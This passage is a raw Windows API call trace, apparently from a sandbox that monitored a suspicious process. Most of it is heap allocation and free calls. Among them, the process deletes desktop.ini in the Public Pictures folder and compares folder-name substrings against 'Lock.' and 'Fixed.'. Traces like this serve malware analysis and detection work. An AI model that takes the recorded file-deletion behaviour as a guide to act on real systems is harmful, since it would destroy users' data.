hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0267.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0267.927] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4a) returned 0x240a4d0 [0267.928] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x24 [0267.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.928] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0x26 [0267.928] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5860 [0267.929] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 1 [0267.930] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0267.930] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0267.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0267.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0267.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4a) returned 0x240a4d0 [0267.932] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x24 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.932] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini")) returned 0xffffffff [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0267.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0267.933] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.933] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.933] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sample Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ample Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mple Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ple Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="le Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.935] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0267.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0267.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0267.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0267.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sample Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ample Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mple Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ple Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="le Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0267.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0267.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0267.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0267.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0267.937] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0267.938] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0267.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0267.938] 